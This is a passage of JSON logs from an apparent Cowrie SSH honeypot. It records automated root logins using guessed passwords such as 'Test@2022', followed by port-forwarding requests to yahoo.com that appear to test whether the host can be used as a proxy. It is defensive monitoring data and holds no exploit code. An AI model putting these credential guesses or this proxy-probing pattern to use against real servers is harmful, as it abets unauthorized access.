{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:44:3507::8000","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:44:3507::8000:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:00:09.855783Z","src_ip":"213.209.150.239","session":"b2f4e8eea5e7"}
{"eventid":"cowrie.session.closed","duration":"0.7","message":"Connection lost after 0.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:00:09.913655Z","src_ip":"213.209.150.239","session":"b2f4e8eea5e7"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":7468,"dst_ip":"1.2.3.4","dst_port":22,"session":"5e55301c1a26","protocol":"ssh","message":"New connection: 213.209.150.239:7468 (1.2.3.4:22) [session: 5e55301c1a26]","sensor":"my-vps","timestamp":"2025-08-26T01:00:09.959347Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T01:00:09.960728Z","src_ip":"213.209.150.239","session":"5e55301c1a26"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T01:00:10.007958Z","src_ip":"213.209.150.239","session":"5e55301c1a26"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T01:00:10.244008Z","src_ip":"213.209.150.239","session":"5e55301c1a26"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"98.137.11.163","dst_port":80,"src_ip":"213.209.150.239","src_port":21948,"message":"direct-tcp connection request to 98.137.11.163:80 from 127.0.0.1:21948","sensor":"my-vps","timestamp":"2025-08-26T01:00:10.292612Z","session":"5e55301c1a26"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"98.137.11.163","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 98.137.11.163:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:00:10.340295Z","src_ip":"213.209.150.239","session":"5e55301c1a26"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:44:3507::8000","dst_port":80,"src_ip":"213.209.150.239","src_port":29297,"message":"direct-tcp connection request to 2001:4998:44:3507::8000:80 from 127.0.0.1:29297","sensor":"my-vps","timestamp":"2025-08-26T01:00:10.477634Z","session":"5e55301c1a26"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:44:3507::8000","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:44:3507::8000:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:00:10.525130Z","src_ip":"213.209.150.239","session":"5e55301c1a26"}
{"eventid":"cowrie.session.closed","duration":"0.6","message":"Connection lost after 0.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:00:10.574048Z","src_ip":"213.209.150.239","session":"5e55301c1a26"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":7521,"dst_ip":"1.2.3.4","dst_port":22,"session":"3b28c8ca2077","protocol":"ssh","message":"New connection: 213.209.150.239:7521 (1.2.3.4:22) [session: 3b28c8ca2077]","sensor":"my-vps","timestamp":"2025-08-26T01:00:10.620373Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T01:00:10.621071Z","src_ip":"213.209.150.239","session":"3b28c8ca2077"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T01:00:10.668425Z","src_ip":"213.209.150.239","session":"3b28c8ca2077"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T01:00:10.903608Z","src_ip":"213.209.150.239","session":"3b28c8ca2077"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"98.137.11.164","dst_port":80,"src_ip":"213.209.150.239","src_port":22628,"message":"direct-tcp connection request to 98.137.11.164:80 from 127.0.0.1:22628","sensor":"my-vps","timestamp":"2025-08-26T01:00:10.951994Z","session":"3b28c8ca2077"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"98.137.11.164","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 98.137.11.164:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:00:10.999408Z","src_ip":"213.209.150.239","session":"3b28c8ca2077"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:24:120d::1:0","dst_port":80,"src_ip":"213.209.150.239","src_port":8874,"message":"direct-tcp connection request to 2001:4998:24:120d::1:0:80 from 127.0.0.1:8874","sensor":"my-vps","timestamp":"2025-08-26T01:00:11.137725Z","session":"3b28c8ca2077"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:24:120d::1:0","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:24:120d::1:0:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:00:11.185083Z","src_ip":"213.209.150.239","session":"3b28c8ca2077"}
{"eventid":"cowrie.session.closed","duration":"0.6","message":"Connection lost after 0.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:00:11.233269Z","src_ip":"213.209.150.239","session":"3b28c8ca2077"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":7563,"dst_ip":"1.2.3.4","dst_port":22,"session":"fb9c5e672638","protocol":"ssh","message":"New connection: 213.209.150.239:7563 (1.2.3.4:22) [session: fb9c5e672638]","sensor":"my-vps","timestamp":"2025-08-26T01:00:11.288707Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T01:00:11.289690Z","src_ip":"213.209.150.239","session":"fb9c5e672638"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T01:00:11.346256Z","src_ip":"213.209.150.239","session":"fb9c5e672638"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T01:00:11.629094Z","src_ip":"213.209.150.239","session":"fb9c5e672638"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.143.26","dst_port":80,"src_ip":"213.209.150.239","src_port":29240,"message":"direct-tcp connection request to 74.6.143.26:80 from 127.0.0.1:29240","sensor":"my-vps","timestamp":"2025-08-26T01:00:11.687462Z","session":"fb9c5e672638"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.143.26","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 74.6.143.26:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:00:11.744321Z","src_ip":"213.209.150.239","session":"fb9c5e672638"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:24:120d::1:1","dst_port":80,"src_ip":"213.209.150.239","src_port":9849,"message":"direct-tcp connection request to 2001:4998:24:120d::1:1:80 from 127.0.0.1:9849","sensor":"my-vps","timestamp":"2025-08-26T01:00:11.898952Z","session":"fb9c5e672638"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:24:120d::1:1","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:24:120d::1:1:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:00:11.955565Z","src_ip":"213.209.150.239","session":"fb9c5e672638"}
{"eventid":"cowrie.session.closed","duration":"0.7","message":"Connection lost after 0.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:00:12.013525Z","src_ip":"213.209.150.239","session":"fb9c5e672638"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":7622,"dst_ip":"1.2.3.4","dst_port":22,"session":"a64886dc79c2","protocol":"ssh","message":"New connection: 213.209.150.239:7622 (1.2.3.4:22) [session: a64886dc79c2]","sensor":"my-vps","timestamp":"2025-08-26T01:00:12.069702Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T01:00:12.070685Z","src_ip":"213.209.150.239","session":"a64886dc79c2"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T01:00:12.127594Z","src_ip":"213.209.150.239","session":"a64886dc79c2"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T01:00:12.411973Z","src_ip":"213.209.150.239","session":"a64886dc79c2"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"98.137.11.163","dst_port":80,"src_ip":"213.209.150.239","src_port":10153,"message":"direct-tcp connection request to 98.137.11.163:80 from 127.0.0.1:10153","sensor":"my-vps","timestamp":"2025-08-26T01:00:12.469712Z","session":"a64886dc79c2"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"98.137.11.163","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 98.137.11.163:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:00:12.526563Z","src_ip":"213.209.150.239","session":"a64886dc79c2"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:24:120d::1:1","dst_port":80,"src_ip":"213.209.150.239","src_port":14582,"message":"direct-tcp connection request to 2001:4998:24:120d::1:1:80 from 127.0.0.1:14582","sensor":"my-vps","timestamp":"2025-08-26T01:00:12.683532Z","session":"a64886dc79c2"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:24:120d::1:1","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:24:120d::1:1:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:00:12.740324Z","src_ip":"213.209.150.239","session":"a64886dc79c2"}
{"eventid":"cowrie.login.success","username":"root","password":"Lvbnhbq27","message":"login attempt [root/Lvbnhbq27] succeeded","sensor":"my-vps","timestamp":"2025-08-26T01:00:12.770147Z","src_ip":"45.88.8.186","session":"832545f3f8ec"}
{"eventid":"cowrie.session.closed","duration":"0.7","message":"Connection lost after 0.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:00:12.797832Z","src_ip":"213.209.150.239","session":"a64886dc79c2"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":7668,"dst_ip":"1.2.3.4","dst_port":22,"session":"13074a425b50","protocol":"ssh","message":"New connection: 213.209.150.239:7668 (1.2.3.4:22) [session: 13074a425b50]","sensor":"my-vps","timestamp":"2025-08-26T01:00:12.844248Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T01:00:12.845179Z","src_ip":"213.209.150.239","session":"13074a425b50"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T01:00:12.892678Z","src_ip":"213.209.150.239","session":"13074a425b50"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T01:00:13.128355Z","src_ip":"213.209.150.239","session":"13074a425b50"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.231.21","dst_port":80,"src_ip":"213.209.150.239","src_port":14516,"message":"direct-tcp connection request to 74.6.231.21:80 from 127.0.0.1:14516","sensor":"my-vps","timestamp":"2025-08-26T01:00:13.176504Z","session":"13074a425b50"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.231.21","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 74.6.231.21:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:00:13.224131Z","src_ip":"213.209.150.239","session":"13074a425b50"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:124:1507::f001","dst_port":80,"src_ip":"213.209.150.239","src_port":10024,"message":"direct-tcp connection request to 2001:4998:124:1507::f001:80 from 127.0.0.1:10024","sensor":"my-vps","timestamp":"2025-08-26T01:00:13.361647Z","session":"13074a425b50"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:124:1507::f001","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:124:1507::f001:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:00:13.408964Z","src_ip":"213.209.150.239","session":"13074a425b50"}
{"eventid":"cowrie.session.closed","duration":"0.6","message":"Connection lost after 0.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:00:13.457353Z","src_ip":"213.209.150.239","session":"13074a425b50"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":7710,"dst_ip":"1.2.3.4","dst_port":22,"session":"ced5a7a210cd","protocol":"ssh","message":"New connection: 213.209.150.239:7710 (1.2.3.4:22) [session: ced5a7a210cd]","sensor":"my-vps","timestamp":"2025-08-26T01:00:13.512802Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T01:00:13.513707Z","src_ip":"213.209.150.239","session":"ced5a7a210cd"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-n